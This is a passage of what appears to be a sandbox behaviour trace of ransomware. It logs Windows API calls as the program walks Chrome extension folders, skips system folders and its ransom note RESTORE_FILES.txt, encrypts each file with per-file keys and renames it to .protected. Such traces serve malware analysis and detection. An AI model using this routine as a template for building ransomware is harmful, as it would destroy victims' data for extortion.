HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.543] StrStrW (lpFirst="cast_route_details.html", lpSrch=".txt") returned 0x0 [0082.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.543] StrStrW (lpFirst="cast_route_details.html", lpSrch=".rar") returned 0x0 [0082.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.543] StrStrW (lpFirst="cast_route_details.html", lpSrch=".zip") returned 0x0 [0082.543] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.798] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.798] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.799] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.799] CloseHandle (hObject=0x160) returned 1 [0082.799] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.protected") returned 172 [0082.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.protected")) returned 1 [0082.800] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="Windows") returned -1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="Program Files") returned -1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="Program Files (x86)") returned -1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="$Recycle.bin") returned 1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="System Volume Information") returned -1 [0082.800] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.800] StrStrIW (lpFirst="cast_route_details.js", lpSrch=".protected") returned 0x0 [0082.800] lstrcmpW (lpString1="cast_route_details.js", lpString2="RESTORE_FILES.txt") returned -1 [0082.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.801] StrStrW (lpFirst="cast_route_details.js", lpSrch=".txt") returned 0x0 [0082.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.801] StrStrW (lpFirst="cast_route_details.js", lpSrch=".rar") returned 0x0 [0082.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.801] StrStrW (lpFirst="cast_route_details.js", lpSrch=".zip") returned 0x0 [0082.801] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.967] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.967] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.024] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.024] CloseHandle (hObject=0x160) returned 1 [0083.024] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.protected") returned 170 [0083.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.protected")) returned 1 [0083.025] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="Windows") returned -1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="Program Files") returned -1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="Program Files (x86)") returned -1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="$Recycle.bin") returned 1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="System Volume Information") returned -1 [0083.025] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.025] StrStrIW (lpFirst="cast_sender.js", lpSrch=".protected") returned 0x0 [0083.025] lstrcmpW (lpString1="cast_sender.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.026] StrStrW (lpFirst="cast_sender.js", lpSrch=".txt") returned 0x0 [0083.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.026] StrStrW (lpFirst="cast_sender.js", lpSrch=".rar") returned 0x0 [0083.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.026] StrStrW (lpFirst="cast_sender.js", lpSrch=".zip") returned 0x0 [0083.026] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.090] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.090] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.090] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.090] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.091] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.091] CloseHandle (hObject=0x160) returned 1 [0083.091] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.protected") returned 163 [0083.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.protected")) returned 1 [0083.092] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.092] lstrcmpiW (lpString1="cast_setup", lpString2="Windows") returned -1 [0083.092] lstrcmpiW (lpString1="cast_setup", lpString2="Program Files") returned -1 [0083.092] lstrcmpiW (lpString1="cast_setup", lpString2="Program Files (x86)") returned -1 [0083.093] lstrcmpiW (lpString1="cast_setup", lpString2="$Recycle.bin") returned 1 [0083.093] lstrcmpiW (lpString1="cast_setup", lpString2="System Volume Information") returned -1 [0083.093] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned 149 [0083.093] lstrcmpW (lpString1="cast_setup", lpString2=".") returned 1 [0083.093] lstrcmpW (lpString1="cast_setup", lpString2="..") returned 1 [0083.093] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*") returned 151 [0083.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0083.134] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.134] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.134] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.134] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.134] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.134] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\.") returned 151 [0083.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.134] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.135] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.135] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.135] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.135] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.135] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\..") returned 152 [0083.135] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.135] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="Windows") returned -1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="Program Files") returned -1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="Program Files (x86)") returned -1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="$Recycle.bin") returned 1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="System Volume Information") returned -1 [0083.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.135] StrStrIW (lpFirst="cast_app.css", lpSrch=".protected") returned 0x0 [0083.135] lstrcmpW (lpString1="cast_app.css", lpString2="RESTORE_FILES.txt") returned -1 [0083.135] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.135] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.136] StrStrW (lpFirst="cast_app.css", lpSrch=".txt") returned 0x0 [0083.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.136] StrStrW (lpFirst="cast_app.css", lpSrch=".rar") returned 0x0 [0083.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.136] StrStrW (lpFirst="cast_app.css", lpSrch=".zip") returned 0x0 [0083.136] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x1a1d, lpOverlapped=0x0) returned 1 [0083.163] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffe5e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.163] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x1a1d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x1a1d, lpOverlapped=0x0) returned 1 [0083.163] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.163] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.164] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.164] CloseHandle (hObject=0x164) returned 1 [0083.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.protected") returned 172 [0083.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.protected")) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="Windows") returned -1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="Program Files") returned -1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="Program Files (x86)") returned -1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="$Recycle.bin") returned 1 [0083.165] lstrcmpiW (lpString1="cast_app.js", lpString2="System Volume Information") returned -1 [0083.165] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.165] StrStrIW (lpFirst="cast_app.js", lpSrch=".protected") returned 0x0 [0083.165] lstrcmpW (lpString1="cast_app.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.165] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.165] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.166] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0083.166] StrStrW (lpFirst="cast_app.js", lpSrch=".txt") returned 0x0 